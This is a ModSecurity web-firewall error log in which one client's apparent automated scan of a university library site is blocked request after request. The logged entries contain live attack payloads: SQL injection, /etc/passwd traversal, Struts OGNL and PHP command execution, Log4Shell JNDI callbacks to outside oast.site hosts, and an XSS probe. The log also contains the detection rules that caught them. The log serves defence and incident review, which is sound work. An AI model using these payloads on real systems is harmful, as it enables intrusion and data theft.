a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAASOUp8AAAAR"]
[Tue Aug 29 11:35:03.318143 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUNalcAAABF"]
[Tue Aug 29 11:35:03.321244 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAULx88AAABD"]
[Tue Aug 29 11:35:03.337722 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUNalgAAABF"]
[Tue Aug 29 11:35:04.315036 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAATUxR4AAAAW"]
[Tue Aug 29 11:35:04.332521 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgx66wsftb7s663.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAAVK0HsAAAAB"]
[Tue Aug 29 11:35:05.305387 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlg9sky8e7s67g4s.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAUB02oAAAA5"]
[Tue Aug 29 11:35:06.327468 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgergjty1jzxi9u.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgergjty1jzxi9u.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAVK0H0AAAAB"]
[Tue Aug 29 11:35:07.315661 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAUDQUIAAAA7"]
[Tue Aug 29 11:35:07.344255 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAATWYSgAAAAa"]
[Tue Aug 29 11:35:08.311540 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAUNal0AAABF"]
[Tue Aug 29 11:35:09.342417 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAUR85AAAABI"]
[Tue Aug 29 11:35:10.343961 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAVWP-oAAAAV"]
[Tue Aug 29 11:35:10.344880 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAASHh9wAAAAD"]
[Tue Aug 29 11:35:10.358911 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAShCbAAAAAi"]
[Tue Aug 29 11:35:12.342409 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUJIzsAAABB"]
[Tue Aug 29 11:35:12.386693 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAAVWQAEAAAAV"]
[Tue Aug 29 11:35:12.462899 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATfd5EAAAAk"]
[Tue Aug 29 11:35:12.657980 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATfd5EAAAAk"]
[Tue Aug 29 11:35:13.340679 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAT2JSMAAAAz"]
[Tue Aug 29 11:35:14.300377 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAVmuKIAAAAT"]
[Tue Aug 29 11:35:14.354133 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAATWYTYAAAAa"]
[Tue Aug 29 11:35:16.219603 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAUXLksAAABM"]
[Tue Aug 29 11:35:16.358880 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAULx@IAAABD"]
[Tue Aug 29 11:35:16.377587 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAUbg2gAAABQ"]
[Tue Aug 29 11:35:16.399103 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAUQ7uMAAABH"]
[Tue Aug 29 11:35:18.448591 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAASI0F0AAAAG"]
[Tue Aug 29 11:35:18.497750 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAATxvZ4AAAAw"]
[Tue Aug 29 11:35:19.303182 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAVWQBMAAAAV"]
[Tue Aug 29 11:35:20.414930 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11iMCo-f0AAATPtU4AAAAM"]
[Tue Aug 29 11:35:21.300082 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAVoCA4AAAAY"]
